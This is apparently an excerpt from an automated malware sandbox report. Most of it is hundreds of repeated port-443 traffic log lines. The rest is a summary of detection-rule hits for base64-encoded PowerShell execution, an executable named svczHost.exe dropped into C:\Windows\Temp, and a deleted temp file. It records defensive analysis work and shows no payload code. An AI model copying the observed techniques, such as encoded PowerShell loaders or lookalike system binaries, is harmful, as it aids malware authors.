        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49952
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49951
        Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
        Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
        Source: unknownNetwork traffic detected: HTTP traffic on port 49955 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49949
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49948
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49947
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49946
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
        Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49943
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
        Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
        Source: unknownNetwork traffic detected: HTTP traffic on port 49945 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
        Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
        Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
        Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49957 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
        Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
        Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
        Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49999
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
        Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
        Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
        Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
        Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49964 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49999 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49963 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50007
        Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
        Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
        Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50001
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
        Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
        Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
        Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49940 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49962 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49970 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50007 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49935 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49946 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49947 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49969 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
        Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49942
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
        Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49941
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49940
        Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49939
        Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49938
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49937
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49936
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49935
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
        Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49934
        Source: unknownHTTPS traffic detected: 104.21.75.170:443 -> 192.168.2.5:49704 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.5:49710 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.75.170:443 -> 192.168.2.5:49714 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.5:49712 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.75.170:443 -> 192.168.2.5:49740 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.5:49810 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.5:49823 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.5:49926 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.5:49974 version: TLS 1.2

        System Summary

        barindex
        Source: amsi64_7368.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: Process Memory Space: powershell.exe PID: 7120, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: Process Memory Space: powershell.exe PID: 7368, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\Temp\svczHost.exeJump to dropped file
        Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile deleted: C:\Windows\Temp\file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF848F492D60_2_00007FF848F492D6
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF848F4A0820_2_00007FF848F4A082
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF848F5B23C0_2_00007FF848F5B23C
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF848F5B2C50_2_00007FF848F5B2C5
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF848F510FA0_2_00007FF848F510FA
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF848F50ED30_2_00007FF848F50ED3
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF848F50D960_2_00007FF848F50D96
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF848F545BF0_2_00007FF848F545BF
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF848F50DEB0_2_00007FF848F50DEB
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FF848FFAB9111_2_00007FF848FFAB91
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_00007FF848F4854224_2_00007FF848F48542
